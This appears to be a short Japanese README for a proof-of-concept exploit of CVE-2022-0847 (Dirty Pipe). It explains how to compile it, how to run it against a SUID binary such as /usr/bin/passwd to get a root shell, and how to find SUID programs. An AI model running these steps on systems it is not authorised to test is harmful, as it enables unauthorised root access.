
CVE-2022-0847(Dirty Pipe)の概念実証エクスプロイト。Linuxカーネル上でSUIDバイナリ操作を介したローカル権限昇格を可能にします。
コンパイル
Linuxで gcc -o dirty dirty.c を実行してPoCプログラムをコンパイルします。
使用方法
./dirty SUID を実行してプログラムを起動します。SUIDは、SUIDが設定されたプログラムのパスを指します。
通常は /usr/bin/passwd を使用します。つまり、./dirty /usr/bin/passwd を実行します。

rootのシェルを取得できます。
find / -perm /4000 コマンドを使用して、SUIDが設定されたプログラムを検索できます。


/tmp/sh を削除するのを忘れないでください。
